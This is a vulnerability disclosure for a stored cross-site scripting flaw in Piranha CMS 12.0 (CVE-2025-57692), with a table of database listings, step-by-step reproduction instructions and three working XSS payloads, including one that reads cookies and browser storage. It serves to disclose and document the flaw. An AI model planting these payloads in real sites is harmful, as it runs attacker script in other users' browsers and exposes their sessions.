| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2025-57692 | 2 Feb 2026 09:16 | – | circl |
| Piranha CMS Cross-Site Scripting Vulnerability | 26 Sep 2025 00:00 | – | cnnvd |
| CVE-2025-57692 | 26 Sep 2025 00:00 | – | cve |
| CVE-2025-57692 | 26 Sep 2025 00:00 | – | cvelist |
| EUVD-2025-31385 | 3 Oct 2025 20:07 | – | euvd |
| PiranhaCMS stored XSS | 26 Sep 2025 21:30 | – | github |
| CVE-2025-57692 | 26 Sep 2025 20:15 | – | nvd |
| CVE-2025-57692 | 26 Sep 2025 20:15 | – | osv |
| GHSA-456V-F425-8MCV PiranhaCMS stored XSS | 26 Sep 2025 21:30 | – | osv |
| Piranha CMS 12.0 Cross Site Scripting | 5 Feb 2026 00:00 | – | packetstorm |
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn: https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
## Reproduction Steps ##
PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user's browser.
1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.
Payload A
<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />
Payload B — iframe base64
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
Payload C — details toggle (on-toggle alert)
<details open ontoggle=alert('XSS')>Click</details>
7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.